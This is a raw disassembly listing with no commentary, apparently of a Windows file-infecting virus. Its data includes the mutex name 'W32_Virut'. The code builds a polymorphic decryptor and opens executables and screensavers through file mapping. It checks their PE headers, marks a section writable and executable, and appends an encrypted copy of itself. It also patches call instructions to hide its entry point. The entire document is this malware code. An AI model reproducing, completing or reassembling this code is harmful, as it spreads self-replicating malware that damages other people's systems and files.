mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_40B1D8
; ---------------------------------------------------------------------------
loc_40B1C3: ; CODE XREF: .rsrc:0040B1B0�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_40B1D8: ; CODE XREF: .rsrc:0040B1C1�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_40B1EB
add ah, 8
loc_40B1EB: ; CODE XREF: .rsrc:0040B1E6�j
or ah, [ebp+40342Bh]
stosw
loc_40B1F3: ; CODE XREF: .rsrc:0040B1A4�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_40B1FB: ; CODE XREF: .rsrc:0040B18D�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_40B210
mov al, 50h
add al, byte ptr ss:loc_403429[ebp]
stosb
loc_40B210: ; CODE XREF: .rsrc:0040B205�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_40B220
add al, 4
loc_40B220: ; CODE XREF: .rsrc:0040B21C�j
lea ecx, [edi-2]
mov ah, byte ptr ss:loc_403429[ebp]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_40B23D
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40B23D: ; CODE XREF: .rsrc:0040B234�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_40B24F
mov ah, 29h
loc_40B24F: ; CODE XREF: .rsrc:0040B24B�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_40B26D
mov al, 86h
loc_40B26D: ; CODE XREF: .rsrc:0040B269�j
mov ah, byte ptr ss:loc_403429[ebp]
stosw
cmp ah, 5
jnz short loc_40B281
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_40B281: ; CODE XREF: .rsrc:0040B278�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_40B298
mov al, 40h
or al, byte ptr ss:loc_403429[ebp]
stosb
jmp short loc_40B2A7
; ---------------------------------------------------------------------------
loc_40B298: ; CODE XREF: .rsrc:0040B28B�j
mov ax, 0C083h
or ah, byte ptr ss:loc_403429[ebp]
stosw
mov al, 1
stosb
loc_40B2A7: ; CODE XREF: .rsrc:0040B296�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_40B2E2
test dword ptr [ebp+403431h], 40000h
jnz short loc_40B2D9
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_40B2E1
; ---------------------------------------------------------------------------
loc_40B2D9: ; CODE XREF: .rsrc:0040B2BD�j
mov al, 40h
or al, [ebp+40342Bh]
loc_40B2E1: ; CODE XREF: .rsrc:0040B2D7�j
stosb
loc_40B2E2: ; CODE XREF: .rsrc:0040B2B1�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_40B2FE
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_40B306
; ---------------------------------------------------------------------------
loc_40B2FE: ; CODE XREF: .rsrc:0040B2EC�j
mov al, 48h
or al, [ebp+40342Ah]
loc_40B306: ; CODE XREF: .rsrc:0040B2FC�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_40B33A
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_40B355
mov cl, 77h
jmp short loc_40B355
; ---------------------------------------------------------------------------
loc_40B33A: ; CODE XREF: .rsrc:0040B313�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_40B355: ; CODE XREF: .rsrc:0040B334�j
; .rsrc:0040B338�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, byte ptr ss:loc_403429[ebp]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_40B3FF
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_40B396
mov eax, 2E876467h
loc_40B396: ; CODE XREF: .rsrc:0040B38F�j
stosd
mov eax, 0
stosw
jnz short loc_40B3A6
mov ax, 0E58Bh
stosw
loc_40B3A6: ; CODE XREF: .rsrc:0040B39E�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_40B3FC
test dword ptr [ebp+403431h], 8000000h
jz short loc_40B3EE
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_40B3E9
mov ax, 424h
stosw
jmp short loc_40B3FC
; ---------------------------------------------------------------------------
loc_40B3E9: ; CODE XREF: .rsrc:0040B3DF�j
mov al, 8
stosb
jmp short loc_40B3FC
; ---------------------------------------------------------------------------
loc_40B3EE: ; CODE XREF: .rsrc:0040B3C6�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_40B3FF
; ---------------------------------------------------------------------------
loc_40B3FC: ; CODE XREF: .rsrc:0040B3BA�j
; .rsrc:0040B3E7�j ...
mov al, 0C9h
stosb
loc_40B3FF: ; CODE XREF: .rsrc:0040B372�j
; .rsrc:0040B3FA�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_40B42B
mov al, 7
sub al, byte ptr ss:loc_403429[ebp]
shl eax, 1Ah
or eax, 240889h
add ah, byte ptr ss:loc_403429[ebp]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_40B42B: ; CODE XREF: .rsrc:0040B409�j
mov ax, 0E0FFh
or ah, byte ptr ss:loc_403429[ebp]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_40B496
test dword ptr [ebp+403431h], 20000000h
jz short loc_40B45C
loc_40B44F: ; CODE XREF: .rsrc:0040B45A�j
test edi, 3
jz short loc_40B45C
mov al, 90h
stosb
jmp short loc_40B44F
; ---------------------------------------------------------------------------
loc_40B45C: ; CODE XREF: .rsrc:0040B44D�j
; .rsrc:0040B455�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, byte ptr ss:loc_403429[ebp]
stosb
test dword ptr [ebp+403431h], offset __ImageBase
jz short loc_40B48A
mov ax, 0C350h
or al, byte ptr ss:loc_403429[ebp]
jmp short loc_40B494
; ---------------------------------------------------------------------------
loc_40B48A: ; CODE XREF: .rsrc:0040B47C�j
mov ax, 0E0FFh
or ah, byte ptr ss:loc_403429[ebp]
loc_40B494: ; CODE XREF: .rsrc:0040B488�j
stosw
loc_40B496: ; CODE XREF: .rsrc:0040B441�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_40B515
test dword ptr [ebp+403431h], 20000000h
jz short loc_40B4BB
loc_40B4AE: ; CODE XREF: .rsrc:0040B4B9�j
test edi, 3
jz short loc_40B4BB
mov al, 90h
stosb
jmp short loc_40B4AE
; ---------------------------------------------------------------------------
loc_40B4BB: ; CODE XREF: .rsrc:0040B4AC�j
; .rsrc:0040B4B4�j
mov ecx, edi
mov eax, dword ptr ss:loc_40399A[ebp]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_40B4E4
lea eax, loc_403429[ebp]
loc_40B4DC: ; CODE XREF: .rsrc:0040B4E2�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_40B4DC
loc_40B4E4: ; CODE XREF: .rsrc:0040B4D4�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_40B4F9
mov ax, 0C031h
stosw
loc_40B4F9: ; CODE XREF: .rsrc:0040B4F1�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_40B512
mov ax, 0C031h
stosw
loc_40B512: ; CODE XREF: .rsrc:0040B50A�j
mov al, 0C3h
stosb
loc_40B515: ; CODE XREF: .rsrc:0040B4A0�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_40B52D
push edi
sub edi, eax
pop eax
jmp short loc_40B546
; ---------------------------------------------------------------------------
loc_40B52D: ; CODE XREF: .rsrc:0040B525�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_40B546: ; CODE XREF: .rsrc:0040B52B�j
mov dword ptr ss:loc_40106D[ebp], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_40B566
neg eax
loc_40B566: ; CODE XREF: .rsrc:0040B562�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_40B56A proc near ; CODE XREF: sub_40B996+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_40B752
call near ptr loc_40B58A+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40B58A: ; CODE XREF: sub_40B56A+F�p
add bh, bh
sub_40B56A endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_40ACA4
mov edx, dword ptr ss:loc_4039A6[ebp]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_40ACA4
mov edi, dword ptr ss:loc_4039A6[ebp]
push esi
call sub_40ACA4
mov edx, dword ptr ss:loc_4039A6[ebp]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_40B752
jz loc_40B752
add esi, dword ptr ss:loc_4039AA[ebp]
add esi, dword ptr ss:loc_403972[ebp]
; START OF FUNCTION CHUNK FOR sub_40B723
loc_40B604: ; CODE XREF: sub_40B723+29�j
lodsb
cmp al, 0E8h
jnz loc_40B6AF
lea eax, [esi+4]
sub eax, dword ptr ss:loc_403972[ebp]
add eax, [esi]
push eax
call sub_40ACA4
cmp dword ptr ss:loc_4039A6[ebp], 0
jnz short loc_40B632
cmp eax, [edi+0Ch]
jnb loc_40B74B
jmp short loc_40B63E
; ---------------------------------------------------------------------------
loc_40B632: ; CODE XREF: sub_40B723-FE�j
cmp dword ptr ss:loc_4039A6[ebp], edx
jnz loc_40B74B
loc_40B63E: ; CODE XREF: sub_40B723-F3�j
add eax, dword ptr ss:loc_403972[ebp]
cmp word ptr [eax], 25FFh
jnz loc_40B74B
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_40ACA4
cmp dword ptr ss:loc_4039A6[ebp], edi
jnz loc_40B74B
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, dword ptr ss:loc_403972[ebp]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_40B74B
cmp eax, [edi+8]
jnb loc_40B74B
loc_40B687: ; CODE XREF: sub_40B723+22�j
add eax, 2
add eax, [edi+14h]
add eax, dword ptr ss:loc_403972[ebp]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr ss:loc_403548[ebp]
pop edx
test eax, eax
jnz loc_40B761
jmp loc_40B74B
; ---------------------------------------------------------------------------
loc_40B6AF: ; CODE XREF: sub_40B723-11C�j
cmp al, 0FFh
jnz loc_40B74B
cmp byte ptr [esi], 15h
jnz loc_40B74B
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_40ACA4
cmp dword ptr ss:loc_4039A6[ebp], edi
jnz short loc_40B74B
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, dword ptr ss:loc_403972[ebp]
mov dword ptr ss:loc_4039CA[ebp], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_40B6F8
cmp eax, [ebp+4039C6h]
jb short loc_40B761
loc_40B6F8: ; CODE XREF: sub_40B723-35�j
cmp eax, 70000000h
jb short loc_40B736
call sub_40B723
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, dword ptr ss:loc_4039CA[ebp]
jnz short locret_40B722
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_40B73D
; ---------------------------------------------------------------------------
locret_40B722: ; CODE XREF: sub_40B723-F�j
retn
; END OF FUNCTION CHUNK FOR sub_40B723
; =============== S U B R O U T I N E =======================================
sub_40B723 proc near ; CODE XREF: sub_40B723-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0040B604 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, dword ptr ss:loc_403972[ebp]
call sub_40ADAB
popa
loc_40B736: ; CODE XREF: sub_40B723-26�j
test eax, 80000000h
jnz short loc_40B74B
loc_40B73D: ; CODE XREF: sub_40B723-3�j
sub eax, [edi+0Ch]
jb short loc_40B74B
cmp eax, [edi+8]
jb loc_40B687
loc_40B74B: ; CODE XREF: sub_40B723-F9�j
; sub_40B723-EB�j ...
dec ecx
jnz loc_40B604
loc_40B752: ; CODE XREF: sub_40B56A+9�j
; .rsrc:0040B5EC�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_40B79D
; ---------------------------------------------------------------------------
loc_40B761: ; CODE XREF: sub_40B723-7F�j
; sub_40B723-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, dword ptr ss:loc_403972[ebp]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_40B79D: ; CODE XREF: sub_40B723+3C�j
pop edi
pop esi
retn
sub_40B723 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B7A0 proc near ; CODE XREF: .rsrc:0040B96E�p
; sub_40B996+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr ss:loc_40357C[ebp]
cmp eax, 0FFFFFFFFh
jz locret_40B871
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_40B871
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr ss:loc_40355C[ebp]
cmp eax, 0FFFFFFFFh
jz loc_40BD29
mov dword ptr ss:loc_403956[ebp], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr ss:loc_403584[ebp]
cmp eax, 0FFFFFFFFh
jz loc_40BD1D
push 0
push dword ptr ss:loc_403956[ebp]
call dword ptr ss:loc_403580[ebp]
cmp eax, 0FFFFFFFFh
jz loc_40BD1D
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr ss:loc_403956[ebp]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_40BD1D
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_40BCF5
mov dword ptr ss:loc_403972[ebp], eax
locret_40B871: ; CODE XREF: sub_40B7A0+10�j
; sub_40B7A0+27�j ...
retn
sub_40B7A0 endp
; =============== S U B R O U T I N E =======================================
sub_40B872 proc near ; CODE XREF: sub_40B996+117�p
; sub_40B996+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_40B88C
add eax, dword ptr ss:loc_40106D[ebp]
loc_40B88C: ; CODE XREF: sub_40B872+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, dword ptr ss:loc_40106D[ebp]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_40B872 endp
; =============== S U B R O U T I N E =======================================
sub_40B8B7 proc near ; CODE XREF: sub_40B996:loc_40B9E5�p
; sub_40B996+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_40B8BC: ; CODE XREF: sub_40B8B7+23�j
jecxz short locret_40B8F3
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_40B8F3
cmp dword ptr [edx+0Ch], 1
jb short loc_40B8BC
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_40B8F3: ; CODE XREF: sub_40B8B7:loc_40B8BC�j
; sub_40B8B7+1D�j ...
retn
sub_40B8B7 endp
; =============== S U B R O U T I N E =======================================
sub_40B8F4 proc near ; CODE XREF: .rsrc:0040B980�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_40B8F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40B901: ; CODE XREF: .rsrc:0040B922�j
mov ecx, edi
jmp short loc_40B910
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_40B90C: ; CODE XREF: .rsrc:0040B91E�j
mov ebx, edi
xor ecx, ecx
loc_40B910: ; CODE XREF: .rsrc:0040B903�j
; .rsrc:0040B926�j
lodsb
cmp al, 61h
jb short loc_40B91B
cmp al, 7Ah
ja short loc_40B91B
sub al, 20h
loc_40B91B: ; CODE XREF: .rsrc:0040B913�j
; .rsrc:0040B917�j
stosb
cmp al, 5Ch
jz short loc_40B90C
cmp al, 2Eh
jz short loc_40B901
cmp al, 0
jnz short loc_40B910
jecxz short locret_40B8F3
mov eax, [ecx]
cmp eax, 455845h
jz short loc_40B93E
cmp eax, 524353h
jnz locret_40B871
loc_40B93E: ; CODE XREF: .rsrc:0040B931�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_40B871
cmp eax, 4E554357h
jz locret_40B871
cmp eax, 32334357h
jz locret_40B871
cmp eax, 4F545350h
jz locret_40B871
xor ebx, ebx
call sub_40B7A0
jz locret_40B871
xor edx, edx
call sub_40B996
call sub_40B8F4
call $+5
pop ebp
sub ebp, offset loc_402F8A
jmp loc_40BCD3
; =============== S U B R O U T I N E =======================================
sub_40B996 proc near ; CODE XREF: .rsrc:0040B97B�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, dword ptr ss:loc_403972[ebp]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_40BCD3
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_40BCD3
test dword ptr [ebx+16h], 2000h
jnz loc_40BCD3
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_40BCD3
jecxz short loc_40B9E5
cmp ecx, 101h
jbe loc_40BCD3
loc_40B9E5: ; CODE XREF: sub_40B996+41�j
call sub_40B8B7
jb loc_40BCD3
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_40A4EF
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_40BA0F: ; CODE XREF: sub_40B996+92�j
push 20h
dec cl
pop eax
js short loc_40BA2A
call sub_40A4EF
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_40BA0F
; ---------------------------------------------------------------------------
loc_40BA2A: ; CODE XREF: sub_40B996+7E�j
; sub_40B996+CD�j ...
push 6
pop ecx
loc_40BA30: ; CODE XREF: sub_40B996+B8�j
push 6
pop eax
call sub_40A4EF
mov al, byte ptr ss:loc_403429[ebp]
xchg al, byte ptr ds:loc_403429[edx+ebp]
mov byte ptr ss:loc_403429[ebp], al
loop loc_40BA30
test dword ptr [ebp+403431h], 8
jnz short loc_40BA65
cmp byte ptr [ebp+40342Bh], 1
jz short loc_40BA2A
loc_40BA65: ; CODE XREF: sub_40B996+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_40BA8C
cmp byte ptr ss:loc_403429[ebp], 5
jz short loc_40BA2A
cmp byte ptr [ebp+40342Ah], 5
jz short loc_40BA2A
cmp byte ptr [ebp+40342Bh], 5
jz short loc_40BA2A
loc_40BA8C: ; CODE XREF: sub_40B996+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_40BAA1
cmp byte ptr ss:loc_403429[ebp], 2
ja short loc_40BA2A
loc_40BAA1: ; CODE XREF: sub_40B996+100�j
and dword ptr [ebp+4039AEh], 0
call loc_40AF3C
call sub_40B872
call sub_40BCDC
mov ebx, [ebp+403976h]
call sub_40B7A0
jz loc_40BCD3
mov esi, dword ptr ss:loc_403972[ebp]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_40B8B7
jb loc_40BCD3
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_40BB09
lea esi, [ebp+40343Ch]
mov ecx, dword ptr ss:loc_40106D[ebp]
rep movsb
loc_40BB09: ; CODE XREF: sub_40B996+163�j
push edi
mov ecx, 90Fh
lea esi, sub_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_40BB1D
rep movsb
loc_40BB1D: ; CODE XREF: sub_40B996+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_40BBD5
push dword ptr [ebx+28h]
call sub_40ACA4
mov edx, dword ptr ss:loc_4039A6[ebp]
test edx, edx
jz loc_40BBD5
mov esi, dword ptr ss:loc_403972[ebp]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_40BB5A
xor ecx, ecx
loc_40BB5A: ; CODE XREF: sub_40B996+1C0�j
add esi, [edx+14h]
cmp ecx, dword ptr ss:loc_40106D[ebp]
mov ecx, dword ptr ss:loc_40106D[ebp]
jb short loc_40BBC1
mov edi, [esp+14h+var_14]
and dword ptr ss:loc_40106D[ebp], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_40BB9A
neg dword ptr [eax]
loc_40BB9A: ; CODE XREF: sub_40B996+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_40BBB8
neg dword ptr [eax]
loc_40BBB8: ; CODE XREF: sub_40B996+21E�j
push ecx
call sub_40B872
pop ecx
jmp short loc_40BBCD
; ---------------------------------------------------------------------------
loc_40BBC1: ; CODE XREF: sub_40B996+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_40BBCD: ; CODE XREF: sub_40B996+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_40BBD5: ; CODE XREF: sub_40B996+191�j
; sub_40B996+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_40BBEE
imul edx, 12345678h
loc_40BBEE: ; CODE XREF: sub_40B996+250�j
mov [eax-1], dl
call sub_409BC2
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_40BC1F
mov [ebp+4039AEh], ecx
add eax, dword ptr ss:loc_40106D[ebp]
and dword ptr [edi+6Dh], 0
loc_40BC1F: ; CODE XREF: sub_40B996+274�j
sub eax, [ebx+28h]
push dword ptr ss:loc_40397E[ebp]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_40BC44
push edx
call sub_40B56A
pop edx
loc_40BC44: ; CODE XREF: sub_40B996+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_40BC4F
mov [ebx+28h], ecx
loc_40BC4F: ; CODE XREF: sub_40B996+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_40BC60
mov [edx+8], ecx
loc_40BC60: ; CODE XREF: sub_40B996+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_40BC91
add ecx, dword ptr ss:loc_40106D[ebp]
loc_40BC91: ; CODE XREF: sub_40B996+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_40BCB3
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_40BCB3
mov dh, [ebp+403430h]
loc_40BCB3: ; CODE XREF: sub_40B996+307�j
; sub_40B996+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_40BCCA
loc_40BCBF: ; CODE XREF: sub_40B996+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_40BCBF
jmp short loc_40BCD3
; ---------------------------------------------------------------------------
loc_40BCCA: ; CODE XREF: sub_40B996+327�j
; sub_40B996+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_40BCCA
loc_40BCD3: ; CODE XREF: .rsrc:0040B991�j
; sub_40B996+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_40B996 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40BCDC proc near ; CODE XREF: sub_40B996+11C�p
cmp dword ptr ss:loc_403956[ebp], 0
jz locret_40B871
push dword ptr ss:loc_403972[ebp]
call dword ptr [ebp+4035C4h]
loc_40BCF5: ; CODE XREF: sub_40B7A0+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr ss:loc_403956[ebp]
call dword ptr [ebp+4035B8h]
loc_40BD1D: ; CODE XREF: sub_40B7A0+6B�j
; sub_40B7A0+82�j ...
push dword ptr ss:loc_403956[ebp]
call dword ptr [ebp+40353Ch]
loc_40BD29: ; CODE XREF: sub_40B7A0+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr ss:loc_403956[ebp], 0
retn
sub_40BCDC endp
; ---------------------------------------------------------------------------
dd 0E8h, 16A5D00h, 3349ED81h, 0F0580040h, 8085C10Fh, 85004015h
dd 0C883C3C0h, 0C10FF0FFh, 40158085h, 103DC300h, 75002A00h
dd 7C81661Ch, 716C0C24h, 0E8601375h, 0FFFFFFC4h, 7EE80575h
dd 0E8FFFFFBh, 0FFFFFFD2h, 2DFF2E61h, 12345678h, 25B8h
dd 0A5E86000h, 75FFFFFFh, 24448B39h, 4EB58D30h, 8B004038h
dd 81660850h, 7302063Ah, 685625h, 8B00FF00h, 52006AC4h
dd 0F895FF50h, 83004035h, 3E8108C4h, 5C3F3F5Ch, 0C6830375h
dd 0FB2BE804h, 7FE8FFFFh, 61FFFFFFh, 74B8C3h, 0B1EB0000h
dd 2FB8h, 10E800h, 20C20000h, 30B800h, 3E80000h, 0C2000000h
dd 548D0024h, 2ECD0C24h, 7C00F883h, 0E86019h, 8B000000h
dd 5D302454h, 0ED811A8Bh, 403413h, 0FFE539E8h, 4C261FFh
dd 5060100h, 5020307h, 560FF48Dh, 7015FF54h, 90010010h
dd 40284DB8h, 28008000h, 67008140h, 90012345h, 0FF1D52A8h
dd 35FF6450h, 0
dd 258964h, 33000000h, 900889C0h, 5E909090h, 0EC246856h
dd 70E7E633h, 0AE041D78h, 1B1D5A9Ah, 0FB695632h, 745BF98Eh
dd 19h, 2Eh dup(0)
dd 7C809B77h, 7C81E4BDh, 7C910331h, 7C80AC28h, 3 dup(0)
dd 7C80C6E0h, 7C801A24h, 7C80946Ch, 7C802367h, 7C810626h
dd 7C81082Fh, 7C8647B7h, 7C80CCA9h, 7C80E9ECh, 7C81174Ch
dd 7C810C8Fh, 7C81F8E2h, 7C80B529h, 7C8606DFh, 7C8221CFh
dd 7C8114ABh, 7C812851h, 7C801D77h, 7C80B78Dh, 7C80B9FEh
dd 7C81E079h, 7C863A8Dh, 7C863C00h, 7C81FB44h, 7C81F955h
dd 7C802442h, 7C810D34h, 7C80B7FCh, 7C809A81h, 7C810F9Fh
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
dd 380036h, 40C058h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 810000h, 0Ch dup(0)
dd 0A0000000h, 7FFDh, 5312h dup(0)
dd 21028h, 2 dup(0)
dd 2103Ch, 9010h, 5 dup(0)
dd 2104Ah, 2105Ah, 2106Ch, 2107Ch, 0
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
